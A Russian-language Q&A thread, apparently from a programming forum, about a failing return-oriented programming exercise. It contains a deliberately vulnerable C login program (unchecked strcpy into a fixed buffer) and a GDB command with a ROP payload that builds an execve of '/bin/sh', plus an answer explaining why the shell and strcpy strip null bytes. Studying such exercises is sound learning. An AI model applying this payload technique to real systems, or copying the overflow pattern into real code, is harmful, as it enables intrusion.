# Buffer overflow, ROP, адреса гаджетов записываются в память без "\x00"

Tags: c, linux, уязвимости

Пытаюсь понять Return oriented programming, делал все по этому гайду http://habrahabr.ru/post/255519/. Но столкнулся с проблемой:

Я перезаписал `%RIP` и записал после него адреса гаджетов, но вместо, например, двух адресов `0x00007ffff7a58b7d` и `0x00007ffff7b2bcd2`, которыми я перезаписывал память после `RIP`, в память были записаны такие адреса `0x7ffff7a58b7d7fff`и `0x7ffff7b2bcd2(первые четыре символа из следующего адреса)`. То есть пропали нули в начале, и адреса сместились на количество этих нулей.

В чем может быть моя проблема?

Код уязвимой программы:

```
#include <string.h>
#include <stdio.h>

int foo(char *bar)
{
    int loggedin = 0;
    char password[50];
    strcpy(password, bar);
    if(strcmp(password, "secur3")==0)
    {
        loggedin = 1;
    }
    return loggedin;
}

int main(int argc, char **argv)
{
    if(foo(argv[1]))
    {
        printf("\n\nLoggedin\n\n");
    }
    else
    {
        printf("\n\nLogin Failed!\n\n");
    }
    return 0;
}
```

Для перезаписи `RIP`  в моем случае требуется 72 байта.

Вот, что я поcылаю на вход программы в GDB:

```
run $(python -c "print 'A'*72+'\x58\xd8\xa5\xf8\xff\7f\x00\x00'+\
'\x3b\x00\x00\x00\x00\x00\x00\x00\x00'+'\x7d\x8b\xa5\xf7\xff\x7f\x00\x00'+\
'\x00\x10\x60\x00\x00\x00\x00\x00'+'\xd2\xbc\xb2\xf7\xff\x7f\x00\x00'+\
'\x68\x73\x2f\x6e\x69\x62\x2f'+'\x43\x50\xab\xf7\xff\x7f\x00\x00'+\
'\xd4\xa5\xb4\xf7\xff\x7f\x00\x00'+'\x00\x00\x00\x00\x00\x00\x00\x00'+\
'\xe0\x1e\xad\xf7\xff\x7f\x00\x00'+'\x00\x00\x00\x00\x00\x00\x00\x00'+'\xd8\x12\xb1\xf7\xff\x7f\x00\x00'")
```

Answer (score 3, accepted):

Вот в приведенном на Хабре примере все "грамотно" сделано, там программа получает ввод gets. А вы пытаетесь его провести через параметры программы.

Я сейчас провел маленький эксперимент

```
python -c "print('A'*10+'\x00\x00BB')" >a
```

В файле `a` как и ожидалось, оказалась строка из десяти 'A' двух нулей и 'BB'. После чего я выполнил:

```
echo $(python -c "print('A'*10+'\x00\x00BB')") >a
```

Т.е. все, что изменилось в команде, я вывод питона передал как параметр команде `echo` которая его напечатала, ну и шелл записал в файл. Так вот в этом случае в файле двоичных нулей нет. Что подтвердило мои опасения, что shell в принципе не передает двоичные нули через командную строку.

Но если бы shell все таки передал строку без изменений, вам бы это слабо помогло, ибо все строковые функции C работают со строками, признаком окончания которых является двоичный 0. Т.е. `strcpy` копирует строку только до первого двоичного ноля в этой строке... Так что придумайте какой нибудь другой уязвимый код, который возьмет данные для переполнения из какого нибудь другого источника и для работы с ними не будет использовать строковые функции. Ну либо надо умудрится сделать рабочую строку без нулей, что мне кажется утопией

Comment: Почему, код без нулевых байт не утопия. Видел даже tutorial по этому поводу.

Comment: @VladD Круто. Но в данном примере у него даже адреса стека содержали 0. Это же надо умудрится найти подходящие для выполнения команды по адресам не содержащим 0. Особенно интересно это в 64-бит режиме ...